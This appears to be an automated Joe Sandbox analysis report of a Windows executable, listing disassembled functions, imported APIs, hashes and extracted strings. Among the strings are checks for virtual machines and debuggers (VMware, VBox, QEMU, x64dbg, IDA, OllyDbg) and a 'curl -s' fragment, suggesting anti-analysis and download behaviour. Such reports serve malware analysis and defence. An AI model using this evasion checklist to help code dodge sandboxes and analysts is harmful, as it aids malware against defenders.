                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                        • String ID:
                                        • API String ID: 313767242-0
                                        • Opcode ID: 9976b80456451c459783d82c79ee402152503cdb330eb85bcad0ad8866f3e4c9
                                        • Instruction ID: 97720e5b1968db7f467b7f1d0f0c5d7b94f44192c6290f3eff956dcf75d54a8d
                                        • Opcode Fuzzy Hash: 9976b80456451c459783d82c79ee402152503cdb330eb85bcad0ad8866f3e4c9
                                        • Instruction Fuzzy Hash: 8F310773619AC196EB648F60E8503AE7360FB84748F44413ADA4EC7B99DF3CD648C720
                                        Function 00007FF670FC3E00 Relevance: 11.3, Strings: 9, Instructions: 56COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: QEMU$VBox$VMware$cheatengine-x86_64.exe$ida.exe$ida64.exe$ollydbg.exe$x32dbg.exe$x64dbg.exe
                                        • API String ID: 0-95170236
                                        • Opcode ID: 2be2b4a24daddba2019c7d8ab6ed27390f433343e14a35d974c3f9b3d3575544
                                        • Instruction ID: 4518031c1a480782708b9485da314e5b1f699194292a13dd427a395aff2d27d8
                                        • Opcode Fuzzy Hash: 2be2b4a24daddba2019c7d8ab6ed27390f433343e14a35d974c3f9b3d3575544
                                        • Instruction Fuzzy Hash: E0214D3762CB86A5E700CB14E8156A977A4FB84748F924132DE4CD3724DF3CE64AC750
                                        Function 00007FF670FCE20C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                        • String ID:
                                        • API String ID: 2933794660-0
                                        • Opcode ID: a97b86fa2f70688a7d9bd2c8f00a38e5f6966c30de59eb49ea82c316ffeec9f8
                                        • Instruction ID: cfe711724a4483031e210e7c79fc91b7fb8169001087d1df8c9869a806bdc72a
                                        • Opcode Fuzzy Hash: a97b86fa2f70688a7d9bd2c8f00a38e5f6966c30de59eb49ea82c316ffeec9f8
                                        • Instruction Fuzzy Hash: 0C111822B28B429AEB00CB61E8693A833A4FB19758F441A31DE6DC77A4EF7CD1548350
                                        Function 00007FF670FC9469 Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ":
                                        • API String ID: 0-3662656813
                                        • Opcode ID: afdbd9ddc8ce0d2222de8917e83101ed04607f0d8a705a8498dbb296d46f9d9f
                                        • Instruction ID: 9779ec1d86a7fc1294aa373f6aba8f49ef2ecc4df104d92c623bc4b3c88f8eb3
                                        • Opcode Fuzzy Hash: afdbd9ddc8ce0d2222de8917e83101ed04607f0d8a705a8498dbb296d46f9d9f
                                        • Instruction Fuzzy Hash: C4B1347761CA8591DB248B26D1893AE6BA1FB88F88F449026CF4E87760DF3DD454C740
                                        Function 00007FF670FC5BF0 Relevance: .2, Instructions: 156COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 31f0e806717852df5f15dadfbf27ccdab67af9a18becda2ccef3f99adf619f2f
                                        • Instruction ID: 0c8c3789d2e6b4225ff2c7317b0dfa9d4b84f707355a6be55cb4b402ba32539f
                                        • Opcode Fuzzy Hash: 31f0e806717852df5f15dadfbf27ccdab67af9a18becda2ccef3f99adf619f2f
                                        • Instruction Fuzzy Hash: 3B5104A3B056C443DB248B49F842796F7A5FB987C5F00A126EE8D97B68EB3CD5808700
                                        Function 00007FF670FCE4C8 Relevance: .0, Instructions: 2COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e43fc8981292af54a203ab563a8965c8683d3708787b238fdd77fd2831c2a668
                                        • Instruction ID: f17e6a8e325e342b94d022a8cea1b3b4b72d74066283e5383949b68969ba2efe
                                        • Opcode Fuzzy Hash: e43fc8981292af54a203ab563a8965c8683d3708787b238fdd77fd2831c2a668
                                        • Instruction Fuzzy Hash: 89A0012A92C886A0E6098B00E8612362220AB55304B900131D80DC36609F3CA5409220
                                        Function 00007FF670FCB100 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 183COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF670FCB158
                                        • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF670FCB178
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF670FCB188
                                        • ?getloc@ios_base@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF670FCB1AD
                                        • ??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF670FCB1C0
                                        • ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF670FCB1DD
                                        • ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140 ref: 00007FF670FCB20F
                                        • ?_Getcat@?$time_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF670FCB240
                                        • ??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF670FCB288
                                        • ?put@?$time_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@QEBA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@AEAVios_base@2@DPEBUtm@@PEBD3@Z.MSVCP140 ref: 00007FF670FCB31B
                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF670FCB338
                                        • ?uncaught_exceptions@std@@YAHXZ.MSVCP140 ref: 00007FF670FCB346
                                        • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF670FCB353
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@$D@std@@@std@@V?$ostreambuf_iterator@$?good@ios_base@std@@D@std@@@std@@@std@@Lockit@std@@$??0_??1_?flush@?$basic_ostream@?getloc@ios_base@std@@?put@?$time_put@?setstate@?$basic_ios@?uncaught_exceptions@std@@Bid@locale@std@@D@std@@@2@Getcat@?$time_put@Getgloballocale@locale@std@@Locimp@12@Osfx@?$basic_ostream@Utm@@V12@V32@V42@@Vfacet@locale@2@Vios_base@2@Vlocale@2@
                                        • String ID: Security$System
                                        • API String ID: 2601024164-2661570791
                                        • Opcode ID: 32f99a87d3a5ab311aaa68574cd87bda19d4f3e88d22cf0ee314562ff2212286
                                        • Instruction ID: 9e4ccc10e85b89d04c1774bd541521197e840444184102c2ccc48d8876d5c8e3
                                        • Opcode Fuzzy Hash: 32f99a87d3a5ab311aaa68574cd87bda19d4f3e88d22cf0ee314562ff2212286
                                        • Instruction Fuzzy Hash: 6E714527A1DAC191EA65CB25E4A43BE6760FB85B85F188232CE9EC3764CF3CD445C310
                                        Function 00007FF670FC32E0 Relevance: 13.6, APIs: 9, Instructions: 129COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF670FC3329
                                        • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF670FC3349
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF670FC3359
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF670FC33B5
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF670FC33DF
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF670FC340E
                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF670FC3459
                                        • ?uncaught_exceptions@std@@YAHXZ.MSVCP140 ref: 00007FF670FC3460
                                        • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF670FC346D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?good@ios_base@std@@$?flush@?$basic_ostream@?setstate@?$basic_ios@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
                                        • String ID:
                                        • API String ID: 3107587312-0
                                        • Opcode ID: 4a2502ecc8ca070d43367042e3d12e437e7251f46653fbf343002d1584a05c5c
                                        • Instruction ID: 9f371351a534e003aeba3ffea8b39ba08921360b5899aef2a96e78ad5f293130
                                        • Opcode Fuzzy Hash: 4a2502ecc8ca070d43367042e3d12e437e7251f46653fbf343002d1584a05c5c
                                        • Instruction Fuzzy Hash: 49512D33618AC196EB258F19E4D023DA7A0FB95B95B158636CE4EC37A0CF2ED4468310
                                        Function 00007FF670FC8AE0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: memset$_invalid_parameter_noinfo_noreturnlocaleconvmalloc
                                        • String ID: Security$System
                                        • API String ID: 4120556116-2661570791
                                        • Opcode ID: 973c031a5a8fc9c7a0768d41abd9d7aba41af98240d1dc33b51a877cc5d0116a
                                        • Instruction ID: 7e209c3996a270b541b8387cf0797853874536a7cd4d7baf5c0e625542039b12
                                        • Opcode Fuzzy Hash: 973c031a5a8fc9c7a0768d41abd9d7aba41af98240d1dc33b51a877cc5d0116a
                                        • Instruction Fuzzy Hash: D3817732A18BC18AE760CF25E8403AE77A0F799B98F148225DE8D87B95DF3CD581C710
                                        Function 00007FF670FC5350 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                        • String ID: \java.exe
                                        • API String ID: 2016347663-3009632800
                                        • Opcode ID: 6633e6177a3443b740a176732380e6e2b1cc47606f2338d7d892142ca5fe476f
                                        • Instruction ID: 518314298fe876c4f0e631593ed8ffe58086389bab84fe3f752d0d0c1a5b4e06
                                        • Opcode Fuzzy Hash: 6633e6177a3443b740a176732380e6e2b1cc47606f2338d7d892142ca5fe476f
                                        • Instruction Fuzzy Hash: D6419D63B29A81A5EA14DB15E4052BE6355EB48BE4F940732DE6DCBBD5DF3CD0818320
                                        Function 00007FF670FC3C80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107COMMON
                                        Download Yara Rule
                                        APIs
                                        • memmove.VCRUNTIME140(?,00000000,00000008,?,00007FF670FC1568), ref: 00007FF670FC3D6A
                                        • memmove.VCRUNTIME140(?,00000000,00000008,?,00007FF670FC1568), ref: 00007FF670FC3D79
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000008,?,00007FF670FC1568), ref: 00007FF670FC3DAD
                                        • memmove.VCRUNTIME140(?,00000000,00000008,?,00007FF670FC1568), ref: 00007FF670FC3DB4
                                        • memmove.VCRUNTIME140(?,00000000,00000008,?,00007FF670FC1568), ref: 00007FF670FC3DC3
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF670FC3DEE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                        • String ID: curl -s
                                        • API String ID: 2016347663-820363595
                                        • Opcode ID: 2347ac5d59e4b872f78fe3b8aab0134d24eb6132abb724e69a6a8a2b476d51d7
                                        • Instruction ID: 7d045ffb6f25a2ff6631af4625e9f780c1b2c9eb4b9ccf585714a2bcfe0e0fe4
                                        • Opcode Fuzzy Hash: 2347ac5d59e4b872f78fe3b8aab0134d24eb6132abb724e69a6a8a2b476d51d7
                                        • Instruction Fuzzy Hash: 6B41A163B2DBC6A5EE109B16A5063AE6255EB44BD0F540732DE6ECB795DF3CE081C310
                                        Function 00007FF670FC2CC0 Relevance: 10.8, APIs: 7, Instructions: 267COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturnmemmove$Concurrency::cancel_current_task$?out@?$codecvt@_Mbstatet@@Mbstatet@@@std@@
                                        • String ID:
                                        • API String ID: 525765215-0
                                        • Opcode ID: c6cdeb64eca4f1f961e730b4080fa50bdbe3b7e8eb71886a262a1a5eee0e9623
                                        • Instruction ID: 29998565619bcc52f538fda49f822d0493c1ad15d81a430305710fc44992f8aa
                                        • Opcode Fuzzy Hash: c6cdeb64eca4f1f961e730b4080fa50bdbe3b7e8eb71886a262a1a5eee0e9623
                                        • Instruction Fuzzy Hash: 55B1AE63F2CB85AAEB40CBA4D8452AE2362EB59B98F404335DE5D97B99DF3CD045C310
                                        Function 00007FF670FCB470 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF670FC34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC34D8
                                          • Part of subcall function 00007FF670FC34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC3579
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCB53E
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCB58D
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCB5CC
                                        • __std_exception_copy.VCRUNTIME140 ref: 00007FF670FCB618
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCB665
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$memmove$__std_exception_copy
                                        • String ID: type_error
                                        • API String ID: 450636425-1406221190
                                        • Opcode ID: 105f28b83217c533a0621a35a7ac762c2119fe9a0180d406f36b6523ef19bbb5
                                        • Instruction ID: 360d51983903ebe99ddd854a003cd0a57c975fca826cf000f00c719eafd3e15e
                                        • Opcode Fuzzy Hash: 105f28b83217c533a0621a35a7ac762c2119fe9a0180d406f36b6523ef19bbb5
                                        • Instruction Fuzzy Hash: A4519F63F2CA82A9EB00DB74D4513AD2321EB457A4F505336EE6CD3B99DF2CE4858310
                                        Function 00007FF670FC38C0 Relevance: 10.6, APIs: 7, Instructions: 142COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: memmove$?uncaught_exceptions@std@@Concurrency::cancel_current_taskD@std@@@std@@Osfx@?$basic_ostream@U?$char_traits@_invalid_parameter_noinfo_noreturn
                                        • String ID:
                                        • API String ID: 3994297871-0
                                        • Opcode ID: 0d3babcc7e1d00f3f4ba6de05bff6259dba674746789e89b6443e5f8b810e014
                                        • Instruction ID: 079f9739f102996c3fbe56f8a3f06ca344dd63a995636fd9c9453601f203697c
                                        • Opcode Fuzzy Hash: 0d3babcc7e1d00f3f4ba6de05bff6259dba674746789e89b6443e5f8b810e014
                                        • Instruction Fuzzy Hash: AC41D063B2DA82A5EE109B26A4063AE6351BB49FD4F144331DE6DCBB95DF7CD0818314
                                        Function 00007FF670FCBD00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF670FC34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC34D8
                                          • Part of subcall function 00007FF670FC34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC3579
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCBDD2
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCBE21
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCBE60
                                        • __std_exception_copy.VCRUNTIME140 ref: 00007FF670FCBEB0
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCBEFD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$memmove$__std_exception_copy
                                        • String ID: other_error
                                        • API String ID: 450636425-896093151
                                        • Opcode ID: 31ea6dbdf5b28761d069e831836c2231da87d872b6197d28bd07c80b67e1e4fa
                                        • Instruction ID: f9bb5603b47276d25e504ea0eb17ea99e12a21b303dd84a1abf2b28e8a91b862
                                        • Opcode Fuzzy Hash: 31ea6dbdf5b28761d069e831836c2231da87d872b6197d28bd07c80b67e1e4fa
                                        • Instruction Fuzzy Hash: 9A518F63E29B86A5EB00CB75D4913AD2321EB457A4F505332EE6CD7B99DF2CE184C310
                                        Function 00007FF670FCBFF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF670FC34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC34D8
                                          • Part of subcall function 00007FF670FC34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC3579
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCC0C2
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCC111
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCC150
                                        • __std_exception_copy.VCRUNTIME140 ref: 00007FF670FCC1A0
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCC1ED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
